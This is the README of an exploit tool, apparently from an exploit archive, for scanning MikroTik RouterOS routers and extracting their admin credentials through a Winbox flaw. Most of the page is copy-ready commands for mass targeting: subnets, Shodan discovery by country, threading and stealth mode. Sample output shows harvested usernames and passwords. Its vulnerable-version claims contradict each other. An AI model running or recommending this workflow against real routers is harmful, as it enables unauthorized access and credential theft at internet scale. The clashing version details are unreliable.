Share
## https://sploitus.com/exploit?id=0E40D288-081E-5B45-A270-EE41E0D8D71D
# Mikrotik Exploit
Scan and Export RouterOS Password

A security research tool for scanning and extracting credentials from Mikrotik RouterOS devices using the Chimay-Red exploit (CVE-2017-20149).

## โš ๏ธ Legal Disclaimer

**This tool is for authorized security testing and research purposes only.** Only use this tool on systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal and unethical.

## โœจ Features

### Core Features
- **Multi-threaded scanning** - Fast parallel scanning of multiple targets
- **Multiple output formats** - Text, JSON, CSV, and HTML reports
- **Progress tracking** - Real-time progress bars and statistics
- **Structured logging** - Detailed logging with configurable levels
- **Shodan integration** - Automated target discovery via Shodan API
- **Flexible input** - Support for single IPs, CIDR ranges, and file lists
- **Modern codebase** - Type hints, proper error handling, and clean architecture

### Advanced Features (Enhanced Scanner)
- **IP Geolocation** - Automatic geolocation lookup for scanned IPs
- **Version Detection** - Detect RouterOS version and skip incompatible versions
- **Checkpoint/Resume** - Save progress and resume interrupted scans
- **Rate Limiting** - Configurable delays and stealth modes
- **Color Output** - Color-coded terminal output for better readability
- **Configuration Files** - YAML/JSON config files for persistent settings
- **Multiple Ports** - Scan multiple ports simultaneously
- **Enhanced Statistics** - Version distribution, country stats, duration tracking
- **Security Warnings** - Permission checks and confirmations for large scans

## ๐Ÿ“‹ Requirements

- Python 3.6+
- pip (Python package manager)

## ๐Ÿš€ Installation

### Quick Install

```bash
# Clone the repository
git clone https://github.com/bgoldmann/Mikrotik-Exploit.git
cd Mikrotik-Exploit

# Install dependencies
pip3 install -r requirements.txt
```

### Manual Installation

```bash
# Core dependencies
pip3 install ipcalc requests

# Optional but recommended
pip3 install tqdm  # Progress bars
pip3 install shodan  # Shodan API support
```

## ๐Ÿ“– Usage

### Basic Usage

```bash
# Scan single IP (standard scanner)
python3 scanner.py 192.168.1.10

# Scan single IP (enhanced scanner with all features)
python3 scanner_enhanced.py 192.168.1.10

# Scan subnet (CIDR notation)
python3 scanner_enhanced.py 192.168.1.0/24

# Scan with custom port
python3 scanner_enhanced.py 192.168.1.10 -p 8282

# Scan from file (one IP per line)
python3 scanner_enhanced.py -f targets.txt
```

### Enhanced Features

```bash
# With geolocation and version detection
python3 scanner_enhanced.py 192.168.1.0/24 --geolocation --version-detect

# Resume interrupted scan
python3 scanner_enhanced.py -f targets.txt --checkpoint --resume

# Multiple ports with rate limiting
python3 scanner_enhanced.py 192.168.1.0/24 --ports 8291,8282 --rate-limit 0.5

# Stealth mode scanning
python3 scanner_enhanced.py 192.168.1.0/24 --stealth stealth

# Use configuration file
python3 scanner_enhanced.py 192.168.1.0/24 --config config.yaml

# HTML report output
python3 scanner_enhanced.py 192.168.1.0/24 --format html -o report.html
```

### Advanced Options

```bash
# Multi-threaded scanning (default: 10 threads)
python3 scanner.py 192.168.1.0/24 -t 20

# Custom timeout
python3 scanner.py 192.168.1.0/24 --timeout 2.0

# Output to JSON file
python3 scanner.py 192.168.1.0/24 --format json -o results.json

# Output to CSV file
python3 scanner.py 192.168.1.0/24 --format csv -o results.csv

# Verbose logging
python3 scanner.py 192.168.1.0/24 -v

# Quiet mode (errors only)
python3 scanner.py 192.168.1.0/24 -q

# Log to file
python3 scanner.py 192.168.1.0/24 --log-file scan.log
```

### Shodan Integration

```bash
# Search and scan Mikrotik routers via Shodan
python3 scanner.py --shodan-query 'product:"MikroTik RouterOS" port:8291' --shodan-key YOUR_API_KEY

# Export Shodan results to file
python3 scanner.py --shodan-query 'product:"MikroTik RouterOS"' --shodan-export targets.txt

# Filter by country
python3 scanner.py --shodan-query 'product:"MikroTik RouterOS"' --shodan-country US --shodan-key YOUR_API_KEY

# Limit results
python3 scanner.py --shodan-query 'product:"MikroTik RouterOS"' --shodan-limit 50 --shodan-key YOUR_API_KEY
```

**Note:** Get your Shodan API key from [https://account.shodan.io/](https://account.shodan.io/)

### Command-Line Options

```
positional arguments:
  targets               IP address(es) or CIDR range(s)

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  File containing IP addresses (one per line)
  -p PORT, --port PORT  Target port (default: 8291)
  -t THREADS, --threads THREADS
                        Number of threads (default: 10)
  --timeout TIMEOUT     Connection timeout in seconds (default: 1.0)
  --format {text,json,csv}
                        Output format (default: text)
  -o OUTPUT, --output OUTPUT
                        Output file path
  -v, --verbose         Verbose output (DEBUG level)
  -q, --quiet           Quiet mode (ERROR only)
  --log-file LOG_FILE   Log file path
  --shodan-query QUERY  Shodan search query
  --shodan-key KEY      Shodan API key (or set SHODAN_API_KEY env var)
  --shodan-limit LIMIT  Maximum Shodan results (default: 100)
  --shodan-country CODE Filter Shodan results by country code
  --shodan-export FILE  Export Shodan results to file instead of scanning
```

## ๐Ÿ“ Output Formats

### Text Format (Default)
```
192.168.1.10:8291
  User: admin
  Pass: password123
------------------

Summary: 1/1 successful
```

### JSON Format
```json
{
  "summary": {
    "total": 1,
    "success": 1,
    "failed": 0,
    "timeout": 0,
    "refused": 0,
    "error": 0
  },
  "results": [
    {
      "ip": "192.168.1.10",
      "port": 8291,
      "success": true,
      "credentials": [
        ["admin", "password123"]
      ]
    }
  ]
}
```

### CSV Format
```csv
IP,Port,Username,Password
192.168.1.10,8291,admin,password123
```

## ๐Ÿ”’ Vulnerable Versions

This exploit targets RouterOS versions:
- **6.29** (released: 2015-05-28) to **6.42** (released: 2018-04-20)
- Patched in version **6.38.5** and later

**Note:** This vulnerability (CVE-2017-20149) has been patched. Only use on systems you own or have permission to test.

## ๐Ÿ›ก๏ธ Secure Your Router

If you're a router administrator, protect your device:

1. **Update RouterOS** to the latest version
2. **Limit Winbox access** to specific IPs:
   ```bash
   ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
   ```
3. **Use strong passwords**
4. **Disable unnecessary services**
5. **Regular security audits**

## ๐Ÿ“‚ Project Structure

```
MikrotikExploit/
โ”œโ”€โ”€ scanner.py              # Standard scanner (modernized)
โ”œโ”€โ”€ scanner_enhanced.py     # Enhanced scanner (all advanced features)
โ”œโ”€โ”€ loop.py                 # Legacy scanner (backward compatibility)
โ”œโ”€โ”€ extract_user.py         # Credential extraction module
โ”œโ”€โ”€ config/
โ”‚   โ”œโ”€โ”€ payloads.py        # Exploit payloads
โ”‚   โ””โ”€โ”€ example.yaml       # Example configuration file
โ”œโ”€โ”€ utils/
โ”‚   โ”œโ”€โ”€ logger.py          # Logging utilities
โ”‚   โ”œโ”€โ”€ shodan_client.py   # Shodan API client
โ”‚   โ”œโ”€โ”€ geolocation.py     # IP geolocation services
โ”‚   โ”œโ”€โ”€ version_detector.py # RouterOS version detection
โ”‚   โ”œโ”€โ”€ checkpoint.py       # Checkpoint/resume functionality
โ”‚   โ”œโ”€โ”€ rate_limiter.py     # Rate limiting and stealth mode
โ”‚   โ”œโ”€โ”€ colors.py           # Color output utilities
โ”‚   โ””โ”€โ”€ config_loader.py   # Configuration file loader
โ”œโ”€โ”€ requirements.txt        # Python dependencies
โ”œโ”€โ”€ README.md              # This file
โ”œโ”€โ”€ CHANGELOG.md           # Version history
โ””โ”€โ”€ UPGRADE_OPTIONS.md     # Upgrade recommendations
```

## ๐Ÿ”„ Migration from loop.py

The new `scanner.py` is backward compatible with `loop.py` but with enhanced features:

```bash
# Old way (still works)
python3 loop.py 192.168.1.10

# New way (recommended)
python3 scanner.py 192.168.1.10
```

## ๐Ÿค Contributing

Contributions are welcome! Please:
1. Fork the repository
2. Create a feature branch
3. Make your changes
4. Submit a pull request

## ๐Ÿ“„ License

MIT License - See [LICENSE](LICENSE) file for details.

## ๐Ÿ™ Credits

This repository is forked from:
- [BigNerd95/Chimay-Red](https://github.com/BigNerd95/Chimay-Red)
- [BasuCert/WinboxPoC](https://github.com/BasuCert/WinboxPoC)

With enhancements for subnet scanning, custom ports, IP lists, and modern Python practices.

## Secure your router
**Update RouterOS and limit Winbox login**
```
ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
```

## Copyright
this repository forked from [BigNerd95/Chimay-Red](https://github.com/BigNerd95/Chimay-Red) and [BasuCert/WinboxPoC](https://github.com/BasuCert/WinboxPoC) with some changes for subnet scan, use different port and IP list file.